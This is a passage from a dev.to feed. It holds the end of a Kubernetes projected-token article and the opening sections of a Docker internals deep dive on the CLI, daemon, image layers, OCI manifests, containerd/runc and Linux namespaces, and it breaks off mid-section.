&lt;li&gt;
&lt;strong&gt;Test token rotation&lt;/strong&gt;: Ensure your applications handle token refresh gracefully&lt;/li&gt;
&lt;/ul&gt;
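&lt;p&gt;When debugging audience or expiry problems, decoding the token's claims is often the fastest diagnostic. JWT claims are base64url-encoded JSON, so plain &lt;code&gt;base64&lt;/code&gt; plus re-padding is enough to inspect them (no signature verification happens here). The sketch builds a fake token so it is self-contained; on a real pod you would read the token from the projected volume path instead:&lt;/p&gt;

```shell
# Build a fake projected-token payload so the example is self-contained;
# a real token would be read from the projected volume path in the pod.
claims='{"aud":["sts.amazonaws.com"],"exp":1700000000,"sub":"system:serviceaccount:default:s3-access-sa"}'
token="eyJhbGciOiJSUzI1NiJ9.$(printf '%s' "$claims" | base64 | tr -d '=\n' | tr '+/' '-_').signature"

# Extract the middle (claims) segment and convert base64url back to base64
seg=$(printf '%s' "$token" | cut -d. -f2 | tr -- '-_' '+/')
# Re-pad to a multiple of 4 before decoding
while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done
decoded=$(printf '%s' "$seg" | base64 -d)
echo "$decoded"
```

&lt;p&gt;The decoded JSON shows the &lt;code&gt;aud&lt;/code&gt;, &lt;code&gt;exp&lt;/code&gt;, and &lt;code&gt;sub&lt;/code&gt; claims, which is usually all you need to confirm a trust-policy mismatch.&lt;/p&gt;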

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Projected service account tokens represent a significant security improvement in Kubernetes authentication. Whether you're running on AKS, EKS, or GKE, understanding how these tokens work enables you to build secure, cloud-native applications that follow the principle of least privilege without managing long-lived credentials.&lt;/p&gt;

&lt;p&gt;The integration with cloud provider IAM systems makes projected tokens essential for modern Kubernetes workloads, providing a secure bridge between your containerized applications and cloud services.&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>eks</category>
      <category>gke</category>
      <category>aks</category>
    </item>
    <item>
      <title>How Docker Actually Works: A Deep Dive into the Internals</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Thu, 05 Feb 2026 03:54:13 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/how-docker-actually-works-a-deep-dive-into-the-internals-501d</link>
      <guid>https://dev.to/piyushjajoo/how-docker-actually-works-a-deep-dive-into-the-internals-501d</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Most developers treat Docker as a black box — you write a Dockerfile, run &lt;code&gt;docker run&lt;/code&gt;, and things just work. But what's actually happening under the hood? This post tears the curtain back and walks through every layer: from the CLI all the way down to Linux kernel primitives that make isolation possible.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;The Big Picture&lt;/li&gt;
&lt;li&gt;The Docker CLI and Client&lt;/li&gt;
&lt;li&gt;The Docker Daemon (dockerd)&lt;/li&gt;
&lt;li&gt;Images: Layered Filesystems&lt;/li&gt;
&lt;li&gt;The Container Runtime: containerd and runc&lt;/li&gt;
&lt;li&gt;Linux Namespaces: Isolation&lt;/li&gt;
&lt;li&gt;cgroups: Resource Control&lt;/li&gt;
&lt;li&gt;Union Filesystems and Storage Drivers&lt;/li&gt;
&lt;li&gt;Networking Internals&lt;/li&gt;
&lt;li&gt;The Full Lifecycle: Start to Finish&lt;/li&gt;
&lt;li&gt;Security Surface and Attack Vectors&lt;/li&gt;
&lt;li&gt;Docker vs. Podman vs. nerdctl vs. Kata Containers&lt;/li&gt;
&lt;li&gt;Summary and Key Takeaways&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  1. The Big Picture
&lt;/h2&gt;

&lt;p&gt;Before we descend into internals, it helps to have a map. Docker is not a single program — it's a stack of cooperating components. Each layer has a distinct job.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fitwq8rtxlf6j4jdbn01e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fitwq8rtxlf6j4jdbn01e.png" alt="big picture" width="800" height="688"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every &lt;code&gt;docker run&lt;/code&gt; command you've ever typed travels through this entire stack. Let's walk it top to bottom.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. The Docker CLI and Client
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;docker&lt;/code&gt; command you type in your terminal is just a &lt;strong&gt;client&lt;/strong&gt;. It does almost nothing by itself — it serializes your intent into REST API calls and forwards them to the daemon.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8z7xntbo0ppuqie7irh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8z7xntbo0ppuqie7irh.png" alt="The Docker CLI and Client" width="800" height="504"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key facts about the CLI:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Communication happens over a &lt;strong&gt;Unix domain socket&lt;/strong&gt; (&lt;code&gt;/var/run/docker.sock&lt;/code&gt;), not TCP, for local interactions. This is why Docker commands feel instantaneous — there's no network round-trip.&lt;/li&gt;
&lt;li&gt;The CLI speaks the &lt;strong&gt;Docker Engine API&lt;/strong&gt; (a versioned REST API). You can call it directly with &lt;code&gt;curl&lt;/code&gt; if you want: &lt;code&gt;curl --unix-socket /var/run/docker.sock http://localhost/images/json&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The CLI is &lt;strong&gt;open source and replaceable&lt;/strong&gt;. Tools like Podman, Buildx, and Docker Compose are all just different clients talking to compatible backends.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  3. The Docker Daemon (dockerd)
&lt;/h2&gt;

&lt;p&gt;The daemon is the &lt;strong&gt;brain&lt;/strong&gt;. It's a long-running background process that manages the entire lifecycle of containers, images, volumes, and networks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihyocmj15l4ygfds2y1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihyocmj15l4ygfds2y1l.png" alt="dockerd" width="800" height="327"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The daemon doesn't actually &lt;em&gt;run&lt;/em&gt; containers itself anymore. That's the result of a critical architectural decision — Docker extracted the container runtime into &lt;strong&gt;containerd&lt;/strong&gt; (spun out of the engine in 2016 and donated to the CNCF in 2017; see Section 5). The daemon now acts as an orchestrator sitting above containerd, handling the higher-level logic like image pulls, build context, log streaming, and networking setup.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Images: Layered Filesystems
&lt;/h2&gt;

&lt;p&gt;A Docker image is &lt;strong&gt;not&lt;/strong&gt; a single monolithic file. It's a stack of read-only &lt;strong&gt;layers&lt;/strong&gt;, each representing a single filesystem change made by a Dockerfile instruction. This is the foundation of Docker's efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 How Layers Are Built
&lt;/h3&gt;

&lt;p&gt;Each instruction in a Dockerfile that modifies the filesystem creates a new layer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ubuntu:22.04          # Layer 0: Base image (multiple layers itself)&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update         &lt;span class="c"&gt;# Layer 1: Updated package index&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; nginx  &lt;span class="c"&gt;# Layer 2: Nginx binaries + deps&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; ./app /opt/app        # Layer 3: Your application code&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["nginx", "-g", "daemon off;"]  # Metadata only — no new layer&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc6zzsobilz7qd6yl48cf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc6zzsobilz7qd6yl48cf.png" alt="layers" width="756" height="2048"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Layer Sharing and The Content-Addressable Store
&lt;/h3&gt;

&lt;p&gt;Every layer is identified by the &lt;strong&gt;SHA-256 hash&lt;/strong&gt; of its contents. This gives Docker two powerful properties:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Deduplication:&lt;/strong&gt; If two images share the same &lt;code&gt;ubuntu:22.04&lt;/code&gt; base, the layers on disk are stored only &lt;strong&gt;once&lt;/strong&gt;. The hash is the same, so Docker knows they're identical.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Shared caching:&lt;/strong&gt; When you rebuild an image and only change Layer 3, Docker reuses Layers 0–2 from cache. It only needs to rebuild from the point of change.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywesevmc3iqk15xh7a9b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywesevmc3iqk15xh7a9b.png" alt="shared caching" width="800" height="229"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Notice how &lt;code&gt;v1&lt;/code&gt; and &lt;code&gt;v2&lt;/code&gt; share the first three layers (ubuntu base, apt-get update, nginx install). Only the final layer differs (app v1 vs. app v2). This is why &lt;code&gt;docker pull&lt;/code&gt; is so fast for incremental updates — it only fetches the delta.&lt;/p&gt;
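&lt;p&gt;The deduplication claim is easy to verify outside Docker. The toy sketch below (file names are invented) hashes two "layers" with identical contents and one that differs; the first two produce the same digest, which is exactly why a content-addressed store keeps only one copy:&lt;/p&gt;

```shell
# Toy illustration of content addressing: identical layer contents produce
# identical digests, so a content-addressed store keeps only one copy.
workdir=$(mktemp -d)
printf 'ubuntu base + nginx\n' > "$workdir/layer-a"   # layer as built for image v1
printf 'ubuntu base + nginx\n' > "$workdir/layer-b"   # same layer, built for image v2
printf 'app code v2\n' > "$workdir/layer-c"           # the layer that actually changed

digest_a=$(sha256sum "$workdir/layer-a" | cut -d' ' -f1)
digest_b=$(sha256sum "$workdir/layer-b" | cut -d' ' -f1)
digest_c=$(sha256sum "$workdir/layer-c" | cut -d' ' -f1)

echo "a=$digest_a"
echo "b=$digest_b"
echo "c=$digest_c"
```

&lt;p&gt;You can see the same effect on real images with &lt;code&gt;docker image inspect&lt;/code&gt;: two tags built from the same base report identical digests in their lower layers.&lt;/p&gt;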

&lt;h3&gt;
  
  
  4.3 The OCI Image Manifest
&lt;/h3&gt;

&lt;p&gt;When you pull an image, the first thing that comes over the wire is the &lt;strong&gt;OCI Image Manifest&lt;/strong&gt; — a JSON document that lists all the layers, their digests, and the image config. Docker then fetches only the layer blobs it doesn't already have:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"schemaVersion"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.manifest.v1+json"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.config.v1+json"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:aaa..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;7023&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"layers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:abc1..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;73400320&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:def2..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;15728640&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:ghi3..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;47185920&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:jkl4..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;5242880&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;strong&gt;config&lt;/strong&gt; blob contains the runtime metadata: environment variables, the entrypoint command, exposed ports, working directory, and the history of how each layer was built.&lt;/p&gt;
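&lt;p&gt;The manifest alone already tells you how much data a pull will transfer: summing the layer &lt;code&gt;size&lt;/code&gt; fields gives the total compressed download. A quick sanity check on the (illustrative) sizes above:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Sum the "size" fields of the four layers in the manifest above
total=$(( 73400320 + 15728640 + 47185920 + 5242880 ))
echo "$total bytes ($(( total / 1048576 )) MiB)"
# 141557760 bytes (135 MiB)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;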




&lt;h2&gt;
  
  
  5. The Container Runtime: containerd and runc
&lt;/h2&gt;

&lt;p&gt;This is where &lt;code&gt;dockerd&lt;/code&gt; hands off actual container creation to the runtime stack, which in turn talks to the Linux kernel. That stack has two tiers.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35urzowty2om1bctbwlh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35urzowty2om1bctbwlh.png" alt="container runtime" width="800" height="447"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  containerd (High-Level Runtime)
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;containerd&lt;/code&gt; is a &lt;strong&gt;daemon&lt;/strong&gt; that manages the lifecycle of containers at a level just above the kernel. It's responsible for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pulling and unpacking images&lt;/strong&gt; into snapshots on disk&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managing snapshots&lt;/strong&gt; via the storage driver (e.g., overlay2)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invoking runc&lt;/strong&gt; to actually create and start containers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exposing a gRPC API&lt;/strong&gt; that dockerd (and Kubernetes, via the CRI interface) uses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;containerd&lt;/code&gt; is a &lt;strong&gt;CNCF graduated project&lt;/strong&gt; — it's the same runtime Kubernetes uses under the hood. This is why production clusters can drop the Docker daemon entirely and talk to containerd directly through its CRI plugin.&lt;/p&gt;

&lt;h3&gt;
  
  
  runc (Low-Level Runtime)
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;runc&lt;/code&gt; is a small, self-contained binary that does the actual work of talking to the kernel. When you ask for a new container, &lt;code&gt;runc&lt;/code&gt; does the following in sequence:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Reads the OCI runtime spec&lt;/strong&gt; — a &lt;code&gt;config.json&lt;/code&gt; generated by containerd that describes the desired container state&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Calls &lt;code&gt;clone()&lt;/code&gt; with &lt;code&gt;CLONE_NEW*&lt;/code&gt; flags&lt;/strong&gt; — one syscall that both creates the new process and drops it into fresh namespaces (&lt;code&gt;setns()&lt;/code&gt; is used when joining namespaces that already exist)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sets up cgroups&lt;/strong&gt; — attaches the new process to resource-limiting control groups&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mounts the filesystem&lt;/strong&gt; — sets up the overlay filesystem, bind mounts, and the &lt;code&gt;/proc&lt;/code&gt; and &lt;code&gt;/sys&lt;/code&gt; pseudo-filesystems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Drops privileges&lt;/strong&gt; — removes capabilities the container doesn't need&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Execs the entrypoint&lt;/strong&gt; — replaces itself with PID 1 inside the container&lt;/li&gt;
&lt;/ol&gt;
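&lt;p&gt;For a feel of what containerd hands over, here is a heavily trimmed sketch of such a &lt;code&gt;config.json&lt;/code&gt; (field values illustrative; the real file containerd generates is far larger):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;{
  "ociVersion": "1.0.2",
  "process": {
    "args": ["nginx", "-g", "daemon off;"],
    "cwd": "/",
    "capabilities": { "bounding": ["CAP_NET_BIND_SERVICE"] }
  },
  "root": { "path": "rootfs", "readonly": false },
  "linux": {
    "namespaces": [
      { "type": "pid" }, { "type": "network" }, { "type": "mount" },
      { "type": "uts" }, { "type": "ipc" }
    ],
    "resources": { "memory": { "limit": 536870912 } }
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;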

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsrv1run3o81mpp2ppfuc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsrv1run3o81mpp2ppfuc.png" alt="runc" width="800" height="592"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Linux Namespaces: Isolation
&lt;/h2&gt;

&lt;p&gt;Namespaces are the &lt;strong&gt;kernel feature&lt;/strong&gt; that makes containers feel like separate machines. Each namespace type isolates a different aspect of the OS. A container typically lives inside &lt;strong&gt;seven&lt;/strong&gt; namespaces simultaneously (though the user namespace is opt-in in Docker, as noted below).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsox6s3bhewl4l8bnz1n6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsox6s3bhewl4l8bnz1n6.png" alt="namespaces isolation" width="754" height="2049"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Namespace Breakdown
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Namespace&lt;/th&gt;
&lt;th&gt;Isolates&lt;/th&gt;
&lt;th&gt;What Happens Inside the Container&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;PID&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Process IDs&lt;/td&gt;
&lt;td&gt;Container's first process is always PID 1. It can't see or signal host processes.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NET&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Network interfaces, routing tables, iptables&lt;/td&gt;
&lt;td&gt;Container gets its own virtual NIC, its own IP, its own loopback.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;MNT&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Mount points&lt;/td&gt;
&lt;td&gt;Container has its own filesystem tree. Host mounts are invisible.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;UTS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Hostname &amp;amp; domain name&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;hostname&lt;/code&gt; returns the container's name, not the host's.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;IPC&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Inter-process communication (shared memory, semaphores, message queues)&lt;/td&gt;
&lt;td&gt;Containers can't touch each other's System V shared memory segments or message queues.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;USER&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;User and group IDs&lt;/td&gt;
&lt;td&gt;Maps the container's root (UID 0) to an unprivileged host UID. Critical for security, but opt-in in Docker (via &lt;code&gt;userns-remap&lt;/code&gt;).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CGROUP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cgroup hierarchy view&lt;/td&gt;
&lt;td&gt;Container sees only its own cgroup subtree, so it can't inspect resource limits of sibling containers.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The PID namespace is particularly elegant. When PID 1 inside a container exits, the &lt;strong&gt;entire container stops&lt;/strong&gt; — just like how killing PID 1 on a real Linux machine shuts everything down. This is why your entrypoint process matters so much.&lt;/p&gt;
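&lt;p&gt;You don't need Docker to see namespaces in action: every Linux process exposes its namespace membership under &lt;code&gt;/proc&lt;/code&gt;. Each entry is a symlink whose inode number identifies the namespace; two processes share a namespace exactly when those inodes match:&lt;/p&gt;

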